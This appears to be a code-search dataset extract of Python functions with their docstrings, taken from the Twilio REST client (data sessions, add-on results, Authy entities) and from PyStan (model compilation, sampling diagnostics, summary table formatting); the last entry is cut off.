def page(self, end=values.unset, start=values.unset, page_token=values.unset, page_number=values.unset, page_size=values.unset): """ Retrieve a single page of DataSessionInstance records from the API. Request is executed immediately :param datetime end: The end :param datetime start: The start :param str page_token: PageToken provided by the API :param int page_number: Page Number, this value is simply for client state :param int page_size: Number of records to return, defaults to 50 :returns: Page of DataSessionInstance :rtype: twilio.rest.wireless.v1.sim.data_session.DataSessionPage """ params = values.of({ 'End': serialize.iso8601_datetime(end), 'Start': serialize.iso8601_datetime(start), 'PageToken': page_token, 'Page': page_number, 'PageSize': page_size, }) response = self._version.page( 'GET', self._uri, params=params, ) return DataSessionPage(self._version, response, self._solution)
python
{ "resource": "" }
q29646
DataSessionPage.get_instance
train
def get_instance(self, payload): """ Build an instance of DataSessionInstance :param dict payload: Payload response from the API :returns: twilio.rest.wireless.v1.sim.data_session.DataSessionInstance :rtype: twilio.rest.wireless.v1.sim.data_session.DataSessionInstance """ return DataSessionInstance(self._version, payload, sim_sid=self._solution['sim_sid'], )
python
{ "resource": "" }
q29647
AddOnResultList.get
train
def get(self, sid): """ Constructs a AddOnResultContext :param sid: The unique string that identifies the resource to fetch :returns: twilio.rest.api.v2010.account.recording.add_on_result.AddOnResultContext :rtype: twilio.rest.api.v2010.account.recording.add_on_result.AddOnResultContext """ return AddOnResultContext( self._version, account_sid=self._solution['account_sid'], reference_sid=self._solution['reference_sid'], sid=sid, )
python
{ "resource": "" }
q29648
AddOnResultPage.get_instance
train
def get_instance(self, payload): """ Build an instance of AddOnResultInstance :param dict payload: Payload response from the API :returns: twilio.rest.api.v2010.account.recording.add_on_result.AddOnResultInstance :rtype: twilio.rest.api.v2010.account.recording.add_on_result.AddOnResultInstance """ return AddOnResultInstance( self._version, payload, account_sid=self._solution['account_sid'], reference_sid=self._solution['reference_sid'], )
python
{ "resource": "" }
q29649
AddOnResultContext.fetch
train
def fetch(self): """ Fetch a AddOnResultInstance :returns: Fetched AddOnResultInstance :rtype: twilio.rest.api.v2010.account.recording.add_on_result.AddOnResultInstance """ params = values.of({}) payload = self._version.fetch( 'GET', self._uri, params=params, ) return AddOnResultInstance( self._version, payload, account_sid=self._solution['account_sid'], reference_sid=self._solution['reference_sid'], sid=self._solution['sid'], )
python
{ "resource": "" }
q29650
AddOnResultContext.payloads
train
def payloads(self): """ Access the payloads :returns: twilio.rest.api.v2010.account.recording.add_on_result.payload.PayloadList :rtype: twilio.rest.api.v2010.account.recording.add_on_result.payload.PayloadList """ if self._payloads is None: self._payloads = PayloadList( self._version, account_sid=self._solution['account_sid'], reference_sid=self._solution['reference_sid'], add_on_result_sid=self._solution['sid'], ) return self._payloads
python
{ "resource": "" }
q29651
MonthlyPage.get_instance
train
def get_instance(self, payload): """ Build an instance of MonthlyInstance :param dict payload: Payload response from the API :returns: twilio.rest.api.v2010.account.usage.record.monthly.MonthlyInstance :rtype: twilio.rest.api.v2010.account.usage.record.monthly.MonthlyInstance """ return MonthlyInstance(self._version, payload, account_sid=self._solution['account_sid'], )
python
{ "resource": "" }
q29652
AvailableAddOnExtensionList.get
train
def get(self, sid): """ Constructs a AvailableAddOnExtensionContext :param sid: The unique Extension Sid :returns: twilio.rest.preview.marketplace.available_add_on.available_add_on_extension.AvailableAddOnExtensionContext :rtype: twilio.rest.preview.marketplace.available_add_on.available_add_on_extension.AvailableAddOnExtensionContext """ return AvailableAddOnExtensionContext( self._version, available_add_on_sid=self._solution['available_add_on_sid'], sid=sid, )
python
{ "resource": "" }
q29653
AvailableAddOnExtensionPage.get_instance
train
def get_instance(self, payload): """ Build an instance of AvailableAddOnExtensionInstance :param dict payload: Payload response from the API :returns: twilio.rest.preview.marketplace.available_add_on.available_add_on_extension.AvailableAddOnExtensionInstance :rtype: twilio.rest.preview.marketplace.available_add_on.available_add_on_extension.AvailableAddOnExtensionInstance """ return AvailableAddOnExtensionInstance( self._version, payload, available_add_on_sid=self._solution['available_add_on_sid'], )
python
{ "resource": "" }
q29654
AvailableAddOnExtensionContext.fetch
train
def fetch(self): """ Fetch a AvailableAddOnExtensionInstance :returns: Fetched AvailableAddOnExtensionInstance :rtype: twilio.rest.preview.marketplace.available_add_on.available_add_on_extension.AvailableAddOnExtensionInstance """ params = values.of({}) payload = self._version.fetch( 'GET', self._uri, params=params, ) return AvailableAddOnExtensionInstance( self._version, payload, available_add_on_sid=self._solution['available_add_on_sid'], sid=self._solution['sid'], )
python
{ "resource": "" }
q29655
EntityList.create
train
def create(self, identity): """ Create a new EntityInstance :param unicode identity: Unique identity of the Entity :returns: Newly created EntityInstance :rtype: twilio.rest.authy.v1.service.entity.EntityInstance """ data = values.of({'Identity': identity, }) payload = self._version.create( 'POST', self._uri, data=data, ) return EntityInstance(self._version, payload, service_sid=self._solution['service_sid'], )
python
{ "resource": "" }
q29656
EntityList.get
train
def get(self, identity): """ Constructs a EntityContext :param identity: Unique identity of the Entity :returns: twilio.rest.authy.v1.service.entity.EntityContext :rtype: twilio.rest.authy.v1.service.entity.EntityContext """ return EntityContext(self._version, service_sid=self._solution['service_sid'], identity=identity, )
python
{ "resource": "" }
q29657
EntityPage.get_instance
train
def get_instance(self, payload): """ Build an instance of EntityInstance :param dict payload: Payload response from the API :returns: twilio.rest.authy.v1.service.entity.EntityInstance :rtype: twilio.rest.authy.v1.service.entity.EntityInstance """ return EntityInstance(self._version, payload, service_sid=self._solution['service_sid'], )
python
{ "resource": "" }
q29658
EntityContext.fetch
train
def fetch(self): """ Fetch a EntityInstance :returns: Fetched EntityInstance :rtype: twilio.rest.authy.v1.service.entity.EntityInstance """ params = values.of({}) payload = self._version.fetch( 'GET', self._uri, params=params, ) return EntityInstance( self._version, payload, service_sid=self._solution['service_sid'], identity=self._solution['identity'], )
python
{ "resource": "" }
q29659
EntityContext.factors
train
def factors(self): """ Access the factors :returns: twilio.rest.authy.v1.service.entity.factor.FactorList :rtype: twilio.rest.authy.v1.service.entity.factor.FactorList """ if self._factors is None: self._factors = FactorList( self._version, service_sid=self._solution['service_sid'], identity=self._solution['identity'], ) return self._factors
python
{ "resource": "" }
q29660
stanc
train
def stanc(file=None, charset='utf-8', model_code=None, model_name="anon_model", include_paths=None, verbose=False, obfuscate_model_name=True): """Translate Stan model specification into C++ code. Parameters ---------- file : {string, file}, optional If filename, the string passed as an argument is expected to be a filename containing the Stan model specification. If file, the object passed must have a 'read' method (file-like object) that is called to fetch the Stan model specification. charset : string, 'utf-8' by default If bytes or files are provided, this charset is used to decode. model_code : string, optional A string containing the Stan model specification. Alternatively, the model may be provided with the parameter `file`. model_name: string, 'anon_model' by default A string naming the model. If none is provided 'anon_model' is the default. However, if `file` is a filename, then the filename will be used to provide a name. include_paths: list of strings, optional Paths for #include files defined in Stan code. verbose : boolean, False by default Indicates whether intermediate output should be piped to the console. This output may be useful for debugging. obfuscate_model_name : boolean, True by default If False the model name in the generated C++ code will not be made unique by the insertion of randomly generated characters. Generally it is recommended that this parameter be left as True. Returns ------- stanc_ret : dict A dictionary with the following keys: model_name, model_code, cpp_code, and status. Status indicates the success of the translation from Stan code into C++ code (success = 0, error = -1). Notes ----- C++ reserved words and Stan reserved words may not be used for variable names; see the Stan User's Guide for a complete list. The `#include` method follows a C/C++ syntax `#include foo/my_gp_funs.stan`. The method needs to be at the start of the row, no whitespace is allowed. After the included file no whitespace or comments are allowed. `pystan.experimental`(PyStan 2.18) has a `fix_include`-function to clean the `#include` statements from the `model_code`. Example: `from pystan.experimental import fix_include` `model_code = fix_include(model_code)` See also -------- StanModel : Class representing a compiled Stan model stan : Fit a model using Stan References ---------- The Stan Development Team (2013) *Stan Modeling Language User's Guide and Reference Manual*. <http://mc-stan.org/>. Examples -------- >>> stanmodelcode = ''' ... data { ... int<lower=0> N; ... real y[N]; ... } ... ... parameters { ... real mu; ... } ... ... model { ... mu ~ normal(0, 10); ... y ~ normal(mu, 1); ... } ... ''' >>> r = stanc(model_code=stanmodelcode, model_name = "normal1") >>> sorted(r.keys()) ['cppcode', 'model_code', 'model_cppname', 'model_name', 'status'] >>> r['model_name'] 'normal1' """ if file and model_code: raise ValueError("Specify stan model with `file` or `model_code`, " "not both.") if file is None and model_code is None: raise ValueError("Model file missing and empty model_code.") if file is not None: if isinstance(file, string_types): try: with io.open(file, 'rt', encoding=charset) as f: model_code = f.read() except: logger.critical("Unable to read file specified by `file`.") raise else: model_code = file.read() # bytes, going into C++ code model_code_bytes = model_code.encode('utf-8') if include_paths is None: include_paths = [os.path.abspath('.')] elif isinstance(include_paths, string_types): include_paths = [include_paths] # add trailing / include_paths = [os.path.join(path, "") for path in include_paths] include_paths_bytes = [path.encode('utf-8') for path in include_paths] # set to False allow_undefined = False if obfuscate_model_name: # Make the model name depend on the code. model_name = ( model_name + '_' + hashlib.md5(model_code_bytes).hexdigest()) model_name_bytes = model_name.encode('ascii') if not isinstance(file, string_types): # use default 'unknown file name' filename_bytes = b'unknown file name' else: # use only the filename, used only for debug printing filename_bytes = os.path.split(file)[-1].encode('utf-8') result = pystan._api.stanc(model_code_bytes, model_name_bytes, allow_undefined, filename_bytes, include_paths_bytes, ) if result['status'] == -1: # EXCEPTION_RC is -1 msg = result['msg'] if PY2: # fix problem with unicode in error message in PY2 msg = msg.encode('ascii', 'replace') error_msg = "Failed to parse Stan model '{}'. Error message:\n{}".format(model_name, msg) raise ValueError(error_msg) elif result['status'] == 0: # SUCCESS_RC is 0 logger.debug("Successfully parsed Stan model '{}'.".format(model_name)) del result['msg'] result.update({'model_name': model_name}) result.update({'model_code': model_code}) result.update({'include_paths' : include_paths}) return result
python
{ "resource": "" }
q29661
stan
train
def stan(file=None, model_name="anon_model", model_code=None, fit=None, data=None, pars=None, chains=4, iter=2000, warmup=None, thin=1, init="random", seed=None, algorithm=None, control=None, sample_file=None, diagnostic_file=None, verbose=False, boost_lib=None, eigen_lib=None, include_paths=None, n_jobs=-1, **kwargs): """Fit a model using Stan. The `pystan.stan` function was deprecated in version 2.17 and will be removed in version 3.0. Compiling and using a Stan Program (e.g., for drawing samples) should be done in separate steps. Parameters ---------- file : string {'filename', file-like object} Model code must found via one of the following parameters: `file` or `model_code`. If `file` is a filename, the string passed as an argument is expected to be a filename containing the Stan model specification. If `file` is a file object, the object passed must have a 'read' method (file-like object) that is called to fetch the Stan model specification. charset : string, optional If bytes or files are provided, this charset is used to decode. 'utf-8' by default. model_code : string A string containing the Stan model specification. Alternatively, the model may be provided with the parameter `file`. model_name: string, optional A string naming the model. If none is provided 'anon_model' is the default. However, if `file` is a filename, then the filename will be used to provide a name. 'anon_model' by default. fit : StanFit instance An instance of StanFit derived from a previous fit, None by default. If `fit` is not None, the compiled model associated with a previous fit is reused and recompilation is avoided. data : dict A Python dictionary providing the data for the model. Variables for Stan are stored in the dictionary as expected. Variable names are the keys and the values are their associated values. Stan only accepts certain kinds of values; see Notes. pars : list of string, optional A list of strings indicating parameters of interest. By default all parameters specified in the model will be stored. chains : int, optional Positive integer specifying number of chains. 4 by default. iter : int, 2000 by default Positive integer specifying how many iterations for each chain including warmup. warmup : int, iter//2 by default Positive integer specifying number of warmup (aka burin) iterations. As `warmup` also specifies the number of iterations used for stepsize adaption, warmup samples should not be used for inference. thin : int, optional Positive integer specifying the period for saving samples. Default is 1. init : {0, '0', 'random', function returning dict, list of dict}, optional Specifies how initial parameter values are chosen: - 0 or '0' initializes all to be zero on the unconstrained support. - 'random' generates random initial values. An optional parameter `init_r` controls the range of randomly generated initial values for parameters in terms of their unconstrained support; - list of size equal to the number of chains (`chains`), where the list contains a dict with initial parameter values; - function returning a dict with initial parameter values. The function may take an optional argument `chain_id`. seed : int or np.random.RandomState, optional The seed, a positive integer for random number generation. Only one seed is needed when multiple chains are used, as the other chain's seeds are generated from the first chain's to prevent dependency among random number streams. By default, seed is ``random.randint(0, MAX_UINT)``. algorithm : {"NUTS", "HMC", "Fixed_param"}, optional One of the algorithms that are implemented in Stan such as the No-U-Turn sampler (NUTS, Hoffman and Gelman 2011) and static HMC. sample_file : string, optional File name specifying where samples for *all* parameters and other saved quantities will be written. If not provided, no samples will be written. If the folder given is not writable, a temporary directory will be used. When there are multiple chains, an underscore and chain number are appended to the file name. By default do not write samples to file. diagnostic_file : string, optional File name specifying where diagnostic information should be written. By default no diagnostic information is recorded. boost_lib : string, optional The path to a version of the Boost C++ library to use instead of the one supplied with PyStan. eigen_lib : string, optional The path to a version of the Eigen C++ library to use instead of the one in the supplied with PyStan. include_paths : list of strings, optional Paths for #include files defined in Stan code. verbose : boolean, optional Indicates whether intermediate output should be piped to the console. This output may be useful for debugging. False by default. control : dict, optional A dictionary of parameters to control the sampler's behavior. Default values are used if control is not specified. The following are adaptation parameters for sampling algorithms. These are parameters used in Stan with similar names: - `adapt_engaged` : bool - `adapt_gamma` : float, positive, default 0.05 - `adapt_delta` : float, between 0 and 1, default 0.8 - `adapt_kappa` : float, between default 0.75 - `adapt_t0` : float, positive, default 10 - `adapt_init_buffer` : int, positive, defaults to 75 - `adapt_term_buffer` : int, positive, defaults to 50 - `adapt_window` : int, positive, defaults to 25 In addition, the algorithm HMC (called 'static HMC' in Stan) and NUTS share the following parameters: - `stepsize`: float, positive - `stepsize_jitter`: float, between 0 and 1 - `metric` : str, {"unit_e", "diag_e", "dense_e"} In addition, depending on which algorithm is used, different parameters can be set as in Stan for sampling. For the algorithm HMC we can set - `int_time`: float, positive For algorithm NUTS, we can set - `max_treedepth` : int, positive n_jobs : int, optional Sample in parallel. If -1 all CPUs are used. If 1, no parallel computing code is used at all, which is useful for debugging. Returns ------- fit : StanFit instance Other parameters ---------------- chain_id : int, optional `chain_id` can be a vector to specify the chain_id for all chains or an integer. For the former case, they should be unique. For the latter, the sequence of integers starting from the given `chain_id` are used for all chains. init_r : float, optional `init_r` is only valid if `init` == "random". In this case, the intial values are simulated from [-`init_r`, `init_r`] rather than using the default interval (see the manual of (Cmd)Stan). test_grad: bool, optional If `test_grad` is ``True``, Stan will not do any sampling. Instead, the gradient calculation is tested and printed out and the fitted StanFit4Model object is in test gradient mode. By default, it is ``False``. append_samples`: bool, optional refresh`: int, optional Argument `refresh` can be used to control how to indicate the progress during sampling (i.e. show the progress every \code{refresh} iterations). By default, `refresh` is `max(iter/10, 1)`. obfuscate_model_name : boolean, optional `obfuscate_model_name` is only valid if `fit` is None. True by default. If False the model name in the generated C++ code will not be made unique by the insertion of randomly generated characters. Generally it is recommended that this parameter be left as True. Examples -------- >>> from pystan import stan >>> import numpy as np >>> model_code = ''' ... parameters { ... real y[2]; ... } ... model { ... y[1] ~ normal(0, 1); ... y[2] ~ double_exponential(0, 2); ... }''' >>> fit1 = stan(model_code=model_code, iter=10) >>> print(fit1) >>> excode = ''' ... transformed data { ... real y[20]; ... y[1] = 0.5796; y[2] = 0.2276; y[3] = -0.2959; ... y[4] = -0.3742; y[5] = 0.3885; y[6] = -2.1585; ... y[7] = 0.7111; y[8] = 1.4424; y[9] = 2.5430; ... y[10] = 0.3746; y[11] = 0.4773; y[12] = 0.1803; ... y[13] = 0.5215; y[14] = -1.6044; y[15] = -0.6703; ... y[16] = 0.9459; y[17] = -0.382; y[18] = 0.7619; ... y[19] = 0.1006; y[20] = -1.7461; ... } ... parameters { ... real mu; ... real<lower=0, upper=10> sigma; ... vector[2] z[3]; ... real<lower=0> alpha; ... } ... model { ... y ~ normal(mu, sigma); ... for (i in 1:3) ... z[i] ~ normal(0, 1); ... alpha ~ exponential(2); ... }''' >>> >>> def initfun1(): ... return dict(mu=1, sigma=4, z=np.random.normal(size=(3, 2)), alpha=1) >>> exfit0 = stan(model_code=excode, init=initfun1) >>> def initfun2(chain_id=1): ... return dict(mu=1, sigma=4, z=np.random.normal(size=(3, 2)), alpha=1 + chain_id) >>> exfit1 = stan(model_code=excode, init=initfun2) """ logger.warning('DeprecationWarning: pystan.stan was deprecated in version 2.17 and will be removed in version 3.0. ' 'Compile and use a Stan program in separate steps.') # NOTE: this is a thin wrapper for other functions. Error handling occurs # elsewhere. if data is None: data = {} if warmup is None: warmup = int(iter // 2) obfuscate_model_name = kwargs.pop("obfuscate_model_name", True) if fit is not None: m = fit.stanmodel else: m = StanModel(file=file, model_name=model_name, model_code=model_code, boost_lib=boost_lib, eigen_lib=eigen_lib, include_paths=include_paths, obfuscate_model_name=obfuscate_model_name, verbose=verbose) # check that arguments in kwargs are valid valid_args = {"chain_id", "init_r", "test_grad", "append_samples", "enable_random_init", "refresh", "control"} for arg in kwargs: if arg not in valid_args: raise ValueError("Parameter `{}` is not recognized.".format(arg)) fit = m.sampling(data, pars=pars, chains=chains, iter=iter, warmup=warmup, thin=thin, seed=seed, init=init, sample_file=sample_file, diagnostic_file=diagnostic_file, verbose=verbose, algorithm=algorithm, control=control, n_jobs=n_jobs, **kwargs) return fit
python
{ "resource": "" }
q29662
ess
train
def ess(sim, n): """Calculate effective sample size Parameters ---------- sim : chains n : int Parameter index starting from 0 """ try: ess = _chains.effective_sample_size(sim, n) except (ValueError, ZeroDivisionError): ess = nan return ess
python
{ "resource": "" }
q29663
traceplot
train
def traceplot(fit, pars, dtypes, **kwargs): """ Use pymc's traceplot to display parameters. Additional arguments are passed to pymc.plots.traceplot. """ # FIXME: eventually put this in the StanFit object # FIXME: write a to_pymc(_trace) function # Deprecation warning added in PyStan 2.18 logger.warning("Deprecation warning."\ " In future, use ArviZ library (`pip install arviz`)") try: from pystan.external.pymc import plots except ImportError: logger.critical("matplotlib required for plotting.") raise if pars is None: pars = list(fit.model_pars) + ["lp__"] values = fit.extract(dtypes=dtypes, pars=pars, permuted=False) values = {key : arr.reshape(-1, int(np.multiply.reduce(arr.shape[2:])), order="F") for key, arr in values.items()} return plots.traceplot(values, pars, **kwargs)
python
{ "resource": "" }
q29664
autocorrplot
train
def autocorrplot(trace, vars=None, fontmap = None, max_lag=100): """Bar plot of the autocorrelation function for a trace""" try: # MultiTrace traces = trace.traces except AttributeError: # NpTrace traces = [trace] if fontmap is None: fontmap = {1:10, 2:8, 3:6, 4:5, 5:4} if vars is None: vars = traces[0].varnames # Extract sample data samples = [{v:trace[v] for v in vars} for trace in traces] chains = len(traces) n = len(samples[0]) f, ax = subplots(n, chains, squeeze=False) max_lag = min(len(samples[0][vars[0]])-1, max_lag) for i, v in enumerate(vars): for j in xrange(chains): d = np.squeeze(samples[j][v]) ax[i,j].acorr(d, detrend=mlab.detrend_mean, maxlags=max_lag) if not j: ax[i, j].set_ylabel("correlation") ax[i, j].set_xlabel("lag") if chains > 1: ax[i, j].set_title("chain {0}".format(j+1)) # Smaller tick labels tlabels = gca().get_xticklabels() setp(tlabels, 'fontsize', fontmap[1]) tlabels = gca().get_yticklabels() setp(tlabels, 'fontsize', fontmap[1])
python
{ "resource": "" }
q29665
check_treedepth
train
def check_treedepth(fit, verbose=True, per_chain=False): """Check for transitions that ended prematurely due to maximum tree depth limit Parameters ---------- fit : StanFit4Model object verbose : bool or int, optional If ``verbose`` is ``False`` or a nonpositive integer, no diagnostic messages are printed, and only the return value of the function conveys diagnostic information. If it is ``True`` (the default) or an integer greater than zero, then a diagnostic message is printed only if there are transitions that ended ended prematurely due to maximum tree depth limit. If it is an integer greater than 2, then extra diagnostic messages are printed. per_chain : bool, optional Print the number of prematurely ending transitions in each chain Returns ------- bool ``True`` if there are no problems with tree depth and ``False`` otherwise. Raises ------ ValueError If ``fit`` has no information about tree depth. This could happen if ``fit`` was generated from a sampler other than NUTS. """ verbosity = int(verbose) sampler_params = fit.get_sampler_params(inc_warmup=False) try: depths = np.column_stack([y['treedepth__'].astype(int) for y in sampler_params]) except: raise ValueError('Cannot access tree depth information from fit object') try: max_treedepth = int(fit.stan_args[0]['ctrl']['sampling']['max_treedepth']) except: raise ValueError('Cannot obtain value of max_treedepth from fit object') n_for_chains = (depths >= max_treedepth).sum(axis=0) n = n_for_chains.sum() if n > 0: if verbosity > 0: N = depths.size logger.warning(('{} of {} iterations saturated the maximum tree depth of {}' + ' ({:.3g} %)').format(n, N, max_treedepth, 100 * n / N)) if per_chain: chain_len, num_chains = depths.shape for chain_num in range(num_chains): if n_for_chains[chain_num] > 0: logger.warning('Chain {}: {} of {} saturated '.format(chain_num + 1, n_for_chains[chain_num], chain_len) + 'the maximum tree depth of {} ({:.3g} %).'.format(max_treedepth, 100 * n_for_chains[chain_num] / chain_len)) logger.warning('Run again with max_treedepth larger than {}'.format(max_treedepth) + ' to avoid saturation') return False else: if verbosity > 2: logger.info('No transitions that ended prematurely due to maximum tree depth limit') return True
python
{ "resource": "" }
q29666
check_n_eff
train
def check_n_eff(fit, pars=None, verbose=True): """Checks the effective sample size per iteration Parameters ---------- fit : StanFit4Model object pars : {str, sequence of str}, optional Parameter (or quantile) name(s). Test only specific parameters. Raises an exception if parameter is not valid. verbose : bool or int, optional If ``verbose`` is ``False`` or a nonpositive integer, no diagnostic messages are printed, and only the return value of the function conveys diagnostic information. If it is ``True`` (the default) or an integer greater than zero, then a diagnostic message is printed only if there are effective sample sizes that appear pathologically low. If it is an integer greater than 1, then parameter (quantile) diagnostics are printed. If integer is greater than 2 extra diagnostic messages are printed. Returns ------- bool ``True`` if there are no problems with effective sample size and ``False`` otherwise. """ verbosity = int(verbose) n_iter = sum(fit.sim['n_save'])-sum(fit.sim['warmup2']) if pars is None: pars = fit.sim['fnames_oi'] else: if isinstance(pars, string_types): pars = [pars] pars = _remove_empty_pars(pars, fit.sim['pars_oi'], fit.sim['dims_oi']) allpars = fit.sim['pars_oi'] + fit.sim['fnames_oi'] _check_pars(allpars, pars) packed_pars = set(pars) - set(fit.sim['fnames_oi']) if packed_pars: unpack_dict = {} for par_unpacked in fit.sim['fnames_oi']: par_packed = par_unpacked.split("[")[0] if par_packed not in unpack_dict: unpack_dict[par_packed] = [] unpack_dict[par_packed].append(par_unpacked) pars_unpacked = [] for par in pars: if par in packed_pars: pars_unpacked.extend(unpack_dict[par]) else: pars_unpacked.append(par) pars = pars_unpacked par_n_dict = {} for n, par in enumerate(fit.sim['fnames_oi']): par_n_dict[par] = n no_warning = True for name in pars: n = par_n_dict[name] n_eff = pystan.chains.ess(fit.sim, n) ratio = n_eff / n_iter if ((ratio < 0.001) or np.isnan(ratio) or np.isinf(ratio)): if verbosity > 1: logger.warning('n_eff / iter for parameter {} is {:.3g}!'.format(name, ratio)) no_warning = False if verbosity <= 1: break if no_warning: if verbosity > 2: logger.info('n_eff / iter looks reasonable for all parameters') return True else: if verbosity > 0: logger.warning('n_eff / iter below 0.001 indicates that the effective sample size has likely been overestimated') return False
python
{ "resource": "" }
q29667
check_hmc_diagnostics
train
def check_hmc_diagnostics(fit, pars=None, verbose=True, per_chain=False, checks=None): """Checks all hmc diagnostics Parameters ---------- fit : StanFit4Model object verbose : bool or int, optional If ``verbose`` is ``False`` or a nonpositive integer, no diagnostic messages are printed, and only the return value of the function conveys diagnostic information. If it is ``True`` (the default) or an integer greater than zero, then diagnostic messages are printed only for diagnostic checks that fail. If ``verbose`` is an integer greater than 1, then parameter (quantile) diagnostics are printed. If ``verbose`` is greater than 2, then extra diagnostic messages are printed. per_chain : bool, optional Where applicable, print diagnostics on a per-chain basis. This applies mainly to the divergence and treedepth checks. checks : list, {"n_eff", "Rhat", "divergence", "treedepth", "energy"}, optional By default run all checks. If ``checks`` is defined, run only checks given in ``checks`` Returns ------- out_dict : dict A dictionary where each key is the name of a diagnostic check, and the value associated with each key is a Boolean value that is True if the check passed and False otherwise. Possible valid keys are 'n_eff', 'Rhat', 'divergence', 'treedepth', and 'energy', though which keys are available will depend upon the sampling algorithm used. """ # For consistency with the individual diagnostic functions verbosity = int(verbose) all_checks = {"n_eff", "Rhat", "divergence", "treedepth", "energy"} if checks is None: checks = all_checks else: undefined_checks = [] for c in checks: # accept lowercase Rhat if c == "rhat": continue if c not in all_checks: undefined_checks.append(c) if undefined_checks: ucstr = "[" + ", ".join(undefined_checks) + "]" msg = "checks: {} are not legal checks: {}".format(ucstr, all_checks) raise TypeError(msg) out_dict = {} if "n_eff" in checks: try: out_dict['n_eff'] = check_n_eff(fit, pars, verbose) except ValueError: if verbosity > 0: logger.warning('Skipping check of effective sample size (n_eff)') if ("Rhat" in checks) or ("rhat" in checks): try: out_dict['Rhat'] = check_rhat(fit, pars, verbose) except ValueError: if verbosity > 0: logger.warning('Skipping check of potential scale reduction factors (Rhat)') if "divergence" in checks: try: out_dict['divergence'] = check_div(fit, verbose, per_chain) except ValueError: if verbosity > 0: logger.warning('Skipping check of divergent transitions (divergence)') if "treedepth" in checks: try: out_dict['treedepth'] = check_treedepth(fit, verbose, per_chain) except ValueError: if verbosity > 0: logger.warning('Skipping check of transitions ending prematurely due to maximum tree depth limit (treedepth)') if "energy" in checks: try: out_dict['energy'] = check_energy(fit, verbose) except ValueError: if verbosity > 0: logger.warning('Skipping check of E-BFMI (energy)') return out_dict
python
{ "resource": "" }
q29668
stansummary
train
def stansummary(fit, pars=None, probs=(0.025, 0.25, 0.5, 0.75, 0.975), digits_summary=2): """ Summary statistic table. Parameters ---------- fit : StanFit4Model object pars : str or sequence of str, optional Parameter names. By default use all parameters probs : sequence of float, optional Quantiles. By default, (0.025, 0.25, 0.5, 0.75, 0.975) digits_summary : int, optional Number of significant digits. By default, 2 Returns ------- summary : string Table includes mean, se_mean, sd, probs_0, ..., probs_n, n_eff and Rhat. Examples -------- >>> model_code = 'parameters {real y;} model {y ~ normal(0,1);}' >>> m = StanModel(model_code=model_code, model_name="example_model") >>> fit = m.sampling() >>> print(stansummary(fit)) Inference for Stan model: example_model. 4 chains, each with iter=2000; warmup=1000; thin=1; post-warmup draws per chain=1000, total post-warmup draws=4000. mean se_mean sd 2.5% 25% 50% 75% 97.5% n_eff Rhat y 0.01 0.03 1.0 -2.01 -0.68 0.02 0.72 1.97 1330 1.0 lp__ -0.5 0.02 0.68 -2.44 -0.66 -0.24 -0.05-5.5e-4 1555 1.0 Samples were drawn using NUTS at Thu Aug 17 00:52:25 2017. For each parameter, n_eff is a crude measure of effective sample size, and Rhat is the potential scale reduction factor on split chains (at convergence, Rhat=1). """ if fit.mode == 1: return "Stan model '{}' is of mode 'test_grad';\n"\ "sampling is not conducted.".format(fit.model_name) elif fit.mode == 2: return "Stan model '{}' does not contain samples.".format(fit.model_name) n_kept = [s - w for s, w in zip(fit.sim['n_save'], fit.sim['warmup2'])] header = "Inference for Stan model: {}.\n".format(fit.model_name) header += "{} chains, each with iter={}; warmup={}; thin={}; \n" header = header.format(fit.sim['chains'], fit.sim['iter'], fit.sim['warmup'], fit.sim['thin'], sum(n_kept)) header += "post-warmup draws per chain={}, total post-warmup draws={}.\n\n" header = header.format(n_kept[0], sum(n_kept)) footer = "\n\nSamples were drawn using {} at {}.\n"\ "For each parameter, n_eff is a crude measure of effective sample size,\n"\ "and Rhat is the potential scale reduction factor on split chains (at \n"\ "convergence, Rhat=1)." sampler = fit.sim['samples'][0]['args']['sampler_t'] date = fit.date.strftime('%c') # %c is locale's representation footer = footer.format(sampler, date) s = _summary(fit, pars, probs) body = _array_to_table(s['summary'], s['summary_rownames'], s['summary_colnames'], digits_summary) return header + body + footer
python
{ "resource": "" }
q29669
_array_to_table
train
def _array_to_table(arr, rownames, colnames, n_digits): """Print an array with row and column names Example: mean se_mean sd 2.5% 25% 50% 75% 97.5% n_eff Rhat beta[1,1] 0.0 0.0 1.0 -2.0 -0.7 0.0 0.7 2.0 4000 1 beta[1,2] 0.0 0.0 1.0 -2.1 -0.7 0.0 0.7 2.0 4000 1 beta[2,1] 0.0 0.0 1.0 -2.0 -0.7 0.0 0.7 2.0 4000 1 beta[2,2] 0.0 0.0 1.0 -1.9 -0.6 0.0 0.7 2.0 4000 1 lp__ -4.2 0.1 2.1 -9.4 -5.4 -3.8 -2.7 -1.2 317 1 """ assert arr.shape == (len(rownames), len(colnames)) rownames_maxwidth = max(len(n) for n in rownames) max_col_width = 7 min_col_width = 5 widths = [rownames_maxwidth] + [max(max_col_width, max(len(n) + 1, min_col_width)) for n in colnames] header = '{:>{width}}'.format('', width=widths[0]) for name, width in zip(colnames, widths[1:]): header += '{name:>{width}}'.format(name=name, width=width) lines = [header] for rowname, row in zip(rownames, arr): line = '{name:{width}}'.format(name=rowname, width=widths[0]) for j, (num, width) in enumerate(zip(row, widths[1:])): if colnames[j] == 'n_eff': num = int(round(num, 0)) if not np.isnan(num) else num line += '{num:>{width}}'.format(num=_format_number(num, n_digits, max_col_width - 1), width=width) lines.append(line) return '\n'.join(lines)
python
{ "resource": "" }
q29670
_format_number_si
train
def _format_number_si(num, n_signif_figures): """Format a number using scientific notation to given significant figures""" if math.isnan(num) or math.isinf(num): return str(num) leading, exp = '{:E}'.format(num).split('E') leading = round(float(leading), n_signif_figures - 1) exp = exp[:1] + exp[2:] if exp[1] == '0' else exp formatted = '{}e{}'.format(leading, exp.lstrip('+')) return formatted
python
{ "resource": "" }
q29671
_format_number
train
def _format_number(num, n_signif_figures, max_width): """Format a number as a string while obeying space constraints. `n_signif_figures` is the minimum number of significant figures expressed `max_width` is the maximum width in characters allowed """ if max_width < 6: raise NotImplementedError("Guaranteed formatting in fewer than 6 characters not supported.") if math.isnan(num) or math.isinf(num): return str(num) # add 0.5 to prevent log(0) errors; only affects n_digits calculation for num > 0 n_digits = lambda num: math.floor(math.log10(abs(num) + 0.5)) + 1 if abs(num) > 10**-n_signif_figures and n_digits(num) <= max_width - n_signif_figures: return str(round(num, n_signif_figures))[:max_width].rstrip('.') elif _number_width(num) <= max_width: if n_digits(num) >= n_signif_figures: # the int() is necessary for consistency between Python 2 and 3 return str(int(round(num))) else: return str(num) else: return _format_number_si(num, n_signif_figures)
python
{ "resource": "" }
q29672
_combine_msd_quan
train
